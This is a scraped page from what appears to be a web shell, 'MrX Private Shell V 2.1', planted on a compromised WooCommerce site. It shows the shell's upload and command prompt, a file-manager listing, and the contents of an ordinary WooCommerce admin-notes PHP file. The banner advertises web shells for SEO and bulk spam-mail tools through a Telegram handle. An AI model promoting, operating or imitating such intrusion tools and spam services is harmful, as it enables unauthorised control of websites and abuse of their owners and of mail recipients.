__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Adds a note when the email improvements feature is enabled for existing stores
 * or when the feature is not enabled to try the new templates.
 *
 * @since 9.9.0
 */

declare( strict_types=1 );

namespace Automattic\WooCommerce\Internal\Admin\Notes;

defined( 'ABSPATH' ) || exit;

use Automattic\WooCommerce\Admin\Notes\Note;
use Automattic\WooCommerce\Admin\Notes\NoteTraits;
use Automattic\WooCommerce\Internal\Admin\EmailImprovements\EmailImprovements as EmailImprovementsFeature;
/**
 * EmailImprovements
 */
class EmailImprovements {
	use NoteTraits;

	/**
	 * Name of the note for use in the database.
	 */
	const NOTE_NAME = 'wc-admin-email-improvements';

	/**
	 * Get the note.
	 *
	 * @return Note|void
	 */
	public static function get_note() {
		if ( EmailImprovementsFeature::is_email_improvements_enabled_for_existing_stores() ) {
			return self::get_email_improvements_enabled_note();
		}

		if ( EmailImprovementsFeature::should_notify_merchant_about_email_improvements() ) {
			return self::get_try_email_improvements_note();
		}
	}

	/**
	 * Get the note for when the email improvements feature is enabled for existing stores.
	 *
	 * @return Note
	 */
	private static function get_email_improvements_enabled_note() {
		$note = new Note();
		$note->set_title( __( 'Your store emails have had an upgrade!', 'woocommerce' ) );
		$note->set_content( __( 'We’ve made some exciting improvements to your email templates, including modern, shopper-friendly designs and new customization options. And if you’re using a block theme, you can automatically sync your theme styles! Head to your email settings to explore the new changes.', 'woocommerce' ) );
		$note->set_type( Note::E_WC_ADMIN_NOTE_INFORMATIONAL );
		$note->set_name( self::NOTE_NAME );
		$note->set_source( 'woocommerce-admin' );
		$note->add_action(
			'customize-your-emails',
			__( 'Customize your emails', 'woocommerce' ),
			'?page=wc-settings&tab=email'
		);
		return $note;
	}

	/**
	 * Get the note for when the email improvements feature is disabled.
	 *
	 * @return Note
	 */
	private static function get_try_email_improvements_note() {
		$note = new Note();
		$note->set_title( __( 'Store emails have had an upgrade!', 'woocommerce' ) );
		$note->set_content( __( 'We’ve made some exciting improvements to our email templates, including modern, shopper-friendly designs and new customization options. And if you’re using a block theme, you can automatically sync your theme styles! Head to your email settings to explore the new features.', 'woocommerce' ) );
		$note->set_type( Note::E_WC_ADMIN_NOTE_INFORMATIONAL );
		$note->set_name( self::NOTE_NAME );
		$note->set_source( 'woocommerce-admin' );
		$note->add_action(
			'try-the-new-templates',
			__( 'Try the new templates', 'woocommerce' ),
			'?page=wc-settings&tab=email&try-new-templates'
		);
		return $note;
	}
}

Filemanager

Name Type Size Permission Actions
CustomizeStoreWithBlocks.php File 2.35 KB 0664
CustomizingProductCatalog.php File 2.2 KB 0664
EUVATNumber.php File 1.63 KB 0664
EditProductsOnTheMove.php File 1.68 KB 0664
EmailImprovements.php File 2.82 KB 0664
FirstProduct.php File 2.18 KB 0664
GivingFeedbackNotes.php File 1.5 KB 0664
InstallJPAndWCSPlugins.php File 4.58 KB 0664
LaunchChecklist.php File 1.68 KB 0664
MagentoMigration.php File 2.45 KB 0664
ManageOrdersOnTheGo.php File 1.54 KB 0664
MarketingJetpack.php File 3.68 KB 0664
MigrateFromShopify.php File 2.21 KB 0664
MobileApp.php File 1.39 KB 0664
NewSalesRecord.php File 5.25 KB 0664
OnboardingPayments.php File 1.74 KB 0664
OnlineClothingStore.php File 2.68 KB 0664
OrderMilestones.php File 9.15 KB 0664
PaymentsMoreInfoNeeded.php File 2.01 KB 0664
PaymentsRemindMeLater.php File 1.94 KB 0664
PerformanceOnMobile.php File 1.64 KB 0664
PersonalizeStore.php File 1.91 KB 0664
RealTimeOrderAlerts.php File 1.51 KB 0664
SellingOnlineCourses.php File 2.38 KB 0664
TrackingOptIn.php File 3.17 KB 0664
UnsecuredReportFiles.php File 2.12 KB 0664
WooCommercePayments.php File 6.25 KB 0664
WooCommerceSubscriptions.php File 1.88 KB 0664
WooSubscriptionsNotes.php File 13.25 KB 0664
Filemanager